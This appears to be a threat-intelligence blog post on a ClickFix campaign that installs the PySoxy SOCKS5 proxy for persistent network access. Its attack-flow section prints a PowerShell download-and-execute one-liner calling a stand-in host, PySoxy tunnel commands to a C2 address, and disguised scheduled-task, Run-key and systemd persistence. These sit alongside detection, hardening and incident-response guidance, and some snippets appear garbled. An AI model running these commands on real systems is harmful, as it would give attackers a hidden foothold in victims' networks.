Listen to this Post

Introduction
A simple copy‑and‑paste script is no longer just a one‑time warning – it is the gateway to a relentless, multi‑layered network invasion. In an April 2026 incident investigated by ReliaQuest, threat actors fused the ClickFix social engineering technique with PySoxy, a ten‑year‑old open‑source Python SOCKS5 proxy. The result is a stealthy, durable access chain that survives standard defensive blocks and transforms an initial user mistake into a permanent foothold.
Learning Objectives
- Understand the updated ClickFix attack flow and how initial PowerShell execution is chained to a persistent proxy.
- Identify PySoxy configuration and network indicators to detect unauthorized SOCKS5 tunnels.
- Apply hardening commands, detection rules, and incident response steps for Windows and Linux environments.
You Should Know:
1. Anatomy of the Modern ClickFix Attack Chain
Traditional ClickFix attacks lure a user into copying and pasting a malicious PowerShell one‑liner, often disguised as a captcha‑verification or error‑fix script. In the 2026 campaign, that payload first downloads a lightweight stager, which then retrieves and executes PySoxy. Instead of a quick smash‑and‑grab, the attackers immediately establish an outbound SOCKS5 tunnel to a command‑and‑control (C2) server.
Example initial PowerShell snippet (obfuscated in the wild):
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "IEX (New-Object Net.WebClient).DownloadString('https://fake-update.com/stage.ps1')"
Once the stager runs, it silently installs PySoxy and configures autostart. The SOCKS5 proxy then allows the attacker to pivot into the internal network, blending their traffic with legitimate outbound HTTPS or WebSocket streams.
Step‑by‑step attack flow:
- Victim copies a malicious command from a fake browser prompt and runs it in PowerShell.
- The script downloads a stager, which fetches PySoxy from a GitHub mirror or paste site.
- PySoxy is configured with a remote C2 address and a local SOCKS5 port (often `1080` or
9050). - Persistence is created via scheduled tasks (Windows) or systemd timers (Linux), ensuring the proxy survives reboots.
- The attacker now routes tools like RDP, SMB scanners, or even Cobalt Strike beacons through the proxy, bypassing egress firewall rules that whitelist only web ports.
2. Understanding PySoxy: The Decade‑Old SOCKS5 Tunnel
PySoxy is a simple Python script (around 300 lines) that implements a SOCKS5 proxy client. It connects to a remote server via TCP or WebSocket and relays traffic back and forth. The tool’s age works in attackers’ favor – it is not flagged by many endpoint detection (EDR) solutions because it lacks malicious signatures and uses pure Python standard libraries.
A typical PySoxy command line used by the attacker after the stager deploys it:
python3 pysoxy.py --server wss://c2.example.com:443/socks5 --listen 127.0.0.1:1080 --encrypt
The `–encrypt` flag adds lightweight XOR or AES obfuscation to the tunnel traffic, making simple packet inspection ineffective. Because PySoxy can operate over WebSockets, it masquerades as a normal web application stream, easily bypassing proxy‑aware egress filters.
To quickly detect a rogue PySoxy process on Linux:
ps aux | grep pysoxy netstat -tunap | grep 1080
On Windows, use PowerShell to list unusual outbound connections:
Get-NetTCPConnection -State Established | Where-Object {$<em>.RemotePort -eq 443 -or $</em>.RemotePort -eq 1080} | Select-Object LocalAddress, RemoteAddress, OwningProcess | Sort-Object OwningProcess -Unique
Look for processes that do not normally initiate long‑lived HTTPS connections.
3. Persistence Mechanisms: Surviving Reboots and Blocks
The 2026 campaign goes beyond a single task. Attackers create redundant persistence methods, so even if one is removed, the proxy returns. On Windows, the following techniques were observed:
- Scheduled Task:
schtasks /create /tn "WindowsUpdateCheck" /tr "python.exe C:\Users\Public\pysoxy.py --server wss://c2.example.com/ws --listen 1080 --encrypt" /sc minute /mo 5 /ru SYSTEM /f
- Registry Run Key:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "OneDriveSync" /t REG_SZ /d "pythonw.exe C:\Users\%USERNAME%\AppData\Local\pysoxy.py --server ..." /f
- WMI Event Subscription (fileless) for persistence that is harder to locate.
On Linux, adversaries add a systemd service:
[bash] Description=System Logging Service After=network.target [bash] ExecStart=/usr/bin/python3 /opt/.cache/pysoxy.py --server wss://c2.example.com/ws --listen 127.0.0.1:1080 --encrypt Restart=always [bash] WantedBy=multi-user.target
Place the unit file under `/etc/systemd/system/systemd-log.service` and enable it. To hunt for these, administrators can run:
systemctl list-units --type=service --state=running | grep -vE '(known.good.services)' find /etc/systemd/system/ -type f -name ".service" -mtime -10
4. Detecting PySoxy Tunnels on Windows and Linux
Continuous detection must cover process behaviour, network anomalies, and persistence artefacts.
Linux detection commands:
- Identify Python processes with suspicious command lines:
ps -ef | grep python | grep -E '(socks5|pysoxy|--server)'
- Check for unexpected listeners on local loopback ports:
ss -tlnp | grep -E '127.0.0.1:(1080|9050|1081)'
- Audit recent modifications in common hidden directories:
find /tmp /var/tmp /dev/shm /opt -name '.py' -mtime -7 -exec ls -la {} \;
Windows detection (PowerShell):
- Enumerate scheduled tasks with hidden execution:
Get-ScheduledTask | Where-Object {$<em>.TaskPath -match "Microsoft" -and $</em>.Actions.Execute -like "python"} | Format-List TaskName,TaskPath,Actions - Monitor for unusual parent‑child process trees (e.g., PowerShell spawning python.exe directly): Microsoft Defender for Endpoint or Sysmon event ID 1. A sample Sysmon rule snippet to catch python.exe with SOCKS5 arguments:
<rulegroup grouprelation="or"> <processcreate onmatch="include"><commandline condition="contains">--listen</commandline> <commandline condition="contains">socks5</commandline> </processcreate></rulegroup>
- Check proxy auto‑configuration (PAC) files or registry settings that could route traffic through a local port.
5. Hardening Your Environment Against SOCKS5 Proxying
Mitigation starts with restricting execution capabilities that ClickFix attacks abuse.
– Enforce PowerShell Constrained Language Mode and disable script execution for standard users via Group Policy:
Computer Configuration\Administrative Templates\Windows Components\Windows PowerShell -> Turn on Script Execution = "Allow only signed scripts"
– Block outbound WebSocket and SOCKS5 ports unless explicitly required. Egress firewall rules should deny direct outbound TCP/1080 and monitor long‑lived TLS sessions to unknown IPs. Use a forward proxy that decrypts and inspects traffic, looking for WebSocket upgrades in HTTP headers.
– Application whitelisting (AppLocker or WDAC) prevents users from running python.exe or python3 from non‑standard paths. Example AppLocker executable rule to block Python in C:\Users\:
<filepathcondition path="%OSDRIVE%\Users\\python.exe">
– Cloud hardening: For AWS instances, restrict outbound traffic via Security Groups to only necessary ports and destinations (e.g., specific API endpoints). Use VPC Flow Logs to hunt for persistent connections on high ports. In Azure, apply NSG rules with logging to detect SOCKS tunnels. On‑premises, network detection and response (NDR) tools can identify periodic keep‑alive WebSocket frames typical of PySoxy.
API security is indirectly impacted because a SOCKS5 proxy inside the network can pivot to internal API endpoints. Always require mutual TLS and short‑lived tokens for internal service communication, making lateral movement harder even if the attacker gains a foothold.
6. Mitigation and Incident Response
If an active PySoxy implant is detected, containment must be immediate and holistic.
1. Isolate the host at the network level while preserving forensic artefacts.
2. Collect volatile data – running processes, network connections, scheduled tasks, and service files (on Linux, `sosreport` or a custom script; on Windows, `kape` or PowerShell snapshots).
3. Remove persistence systematically. For Windows:
schtasks /delete /tn "WindowsUpdateCheck" /f reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "OneDriveSync" /f
On Linux:
systemctl stop systemd-log.service && systemctl disable systemd-log.service && rm /etc/systemd/system/systemd-log.service
4. Reset credentials and review authentication logs for lateral movement that may have occurred via the proxy.
5. Update detection rules in your SIEM with the indicators from this article, including command‑line patterns and outbound WebSocket connections to suspicious domains.
7. Building Resilience: Simulating and Testing Your Defenses
Red teams and security engineers can recreate the attack in a controlled lab to validate detection rules.
– Deploy a test Windows VM with Python installed.
– Run a benign version of PySoxy against a local listener to generate telemetry.
– Test whether your EDR triggers on `python.exe` making outbound WebSocket connections from a user directory.
– Validate that egress firewall alerts fire when the tool uses TLS on port 443 to an untrusted IP.
By proactively simulating the ClickFix + PySoxy chain, defenders close gaps before adversaries exploit them.
What the Undercode Say
- The ReliaQuest investigation highlights that attackers are shifting from simple payload execution to long‑term access brokering. The use of a decade‑old proxy tool underscores that “living‑off‑the‑land” now includes leveraging open‑source utilities that are invisible to signature‑based detection.
- Redundant persistence mechanisms, including WMI and systemd, ensure that even if a security tool removes one artefact, the proxy reappears. This calls for continuous configuration auditing rather than point‑in‑time removal.
The discovery reveals a strategic pivot: the initial ClickFix compromise is no longer the endgame – it is the front door to a persistent, monetisable network foothold that can be sold to ransomware affiliates. Organisations must treat every copy‑paste prompt as a potential full‑chain intrusion and build defence‑in‑depth that expects the proxy, not just the payload.
Prediction
The combination of social‑engineering‑driven execution and protocol‑agnostic SOCKS5 tunnels will become a standard module in initial access broker kits. We will likely see attackers integrate PySoxy with modern implant frameworks such as Havoc or Sliver, using encrypted WebSockets over common CDN domains (e.g., Cloudflare Workers) to defeat domain reputation filters. In response, network detection will need to evolve toward behavioural analysis of connection cadence and TLS fingerprinting rather than port or protocol blocks. Ultimately, the only reliable protection is an endpoint that refuses to execute untrusted scripts – shifting the burden from detection to prevention.
▶️ Related Video (76% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Varshu25 Hackers – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


